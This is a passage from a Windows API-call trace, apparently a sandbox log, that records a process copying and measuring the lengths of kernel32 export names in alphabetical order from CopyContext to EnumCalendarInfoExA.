returned="ConvertThreadToFiberEx" [0085.263] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.263] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.263] lstrlenA (lpString="COPYFILEA") returned 9 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.263] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.263] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.263] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.263] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.263] lstrlenA (lpString="COPYFILEW") returned 9 [0085.263] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.263] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.264] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.264] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.264] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.264] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.264] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.264] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.264] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.264] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.264] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.264] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.264] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.264] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.264] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.264] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.264] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.264] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.264] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.264] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.264] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.265] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.265] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.265] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.265] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.265] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.265] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.265] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.265] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.265] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.265] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.265] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.265] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.265] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.265] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.265] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.265] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.265] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.265] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.265] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.265] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.266] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.266] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.266] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.266] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.266] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.266] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.266] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.266] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.266] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.266] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.267] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.267] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.267] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.267] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.267] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.267] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.267] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.267] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.267] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.267] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.267] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.267] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.267] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.267] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.267] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.267] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.267] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.267] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.267] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.268] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.268] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.268] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.268] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.268] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.268] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.268] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.268] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.268] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.268] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.268] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.268] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.268] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.268] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.268] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.268] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.268] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.268] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.268] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.268] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.269] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.269] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.269] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.269] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.269] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.269] lstrlenA (lpString="DELETEATOM") returned 10 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.269] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.269] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.269] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.269] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.269] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.269] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.269] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.269] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.269] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.269] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.269] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.269] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.269] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.269] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.270] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.270] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.270] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.270] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.270] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.270] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.270] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.270] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.270] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.270] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.270] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.270] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.270] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.270] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.270] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.270] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.270] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.270] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.270] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.270] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.271] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.271] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 